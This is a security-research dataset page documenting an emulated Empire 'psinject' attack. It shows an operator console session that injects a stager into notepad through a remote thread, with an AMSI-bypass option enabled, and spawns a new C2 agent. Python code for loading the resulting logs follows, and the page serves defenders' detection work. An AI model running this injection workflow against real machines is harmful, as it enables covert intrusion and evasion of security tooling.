Empire PSInject
Contents
Empire PSInject#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/05/18 |
Modification Date |
2020/09/20 |
Tactics |
|
Techniques |
|
Tags |
PE Injection,WriteProcessMemory,CreateRemoteThread Execution |
Dataset Description#
This dataset represents adversaries reflectively loading/intecting a portable executable (PE) (not on disk) into a process via WriteprocessMemory and executed via CreateRemoteThread APIs
Datasets Downloads#
Type |
Link |
|---|---|
Host |
Adversary View#
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
62HY9XCK ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 3172 5/0.0 2020-08-07 14:30:45 http
F82SZKVW ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 6008 5/0.0 2020-08-07 18:31:11 http
(Empire: agents) > interact F82SZKVW
(Empire: F82SZKVW) >
(Empire: F82SZKVW) >
(Empire: F82SZKVW) > usemodule management/psinject
(Empire: powershell/management/psinject) >
(Empire: powershell/management/psinject) > set ProcName notepad
(Empire: powershell/management/psinject) > set Listener http
(Empire: powershell/management/psinject) > info
Name: Invoke-PSInject
Module: powershell/management/psinject
NeedsAdmin: False
OpsecSafe: True
Language: powershell
MinLanguageVersion: 2
Background: True
OutputExtension: None
Authors:
@harmj0y
@sixdub
leechristensen (@tifkin_)
Description:
Utilizes Powershell to to inject a Stephen Fewer formed
ReflectivePick which executes PS codefrom memory in a remote
process. ProcID or ProcName must be specified.
Comments:
http://sixdub.net
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True F82SZKVW Agent to run module on.
ProcId False ProcessID to inject into.
ProcName False notepad Process name to inject into.
Listener True http Listener to use.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
AMSIBypass False True Include mattifestation's AMSI Bypass in
the stager code.
AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in
the stager code.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
(Empire: powershell/management/psinject) > execute
[*] Tasked F82SZKVW to run TASK_CMD_JOB
[*] Agent F82SZKVW tasked with task ID 1
[*] Tasked agent F82SZKVW to run module powershell/management/psinject
(Empire: powershell/management/psinject) >
Job started: F48GDZ
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent Y9RCLV64 checked in
[+] Initial agent Y9RCLV64 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to Y9RCLV64 at 172.18.39.5
(Empire: powershell/management/psinject) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
62HY9XCK ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 3172 5/0.0 2020-08-07 14:30:45 http
F82SZKVW ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 6008 5/0.0 2020-08-07 18:32:51 http
Y9RCLV64 ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo notepad 2576 5/0.0 2020-08-07 18:32:52 http
(Empire: agents) >
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_psinject_PEinjection.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)